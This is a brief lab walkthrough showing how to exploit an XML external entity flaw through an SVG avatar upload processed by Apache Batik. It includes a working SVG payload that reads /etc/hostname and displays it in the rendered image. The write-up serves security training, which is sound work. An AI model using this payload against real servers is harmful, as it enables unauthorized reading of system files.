Lab link.
This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
To solve the lab, upload an image that displays the contents of the
/etc/hostname
file after processing. Then use the “Submit solution” button to submit the value of the server hostname.
In some systems, we need to get ourselves an attack surface. This lab also has a comment section that takes an image file. We can embed XML in the image file or edit the request.
If we upload a png file, this is how the request will look like.
We edit it to XML.
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
/etc/hostname comes in the image part of the page where the comment is added.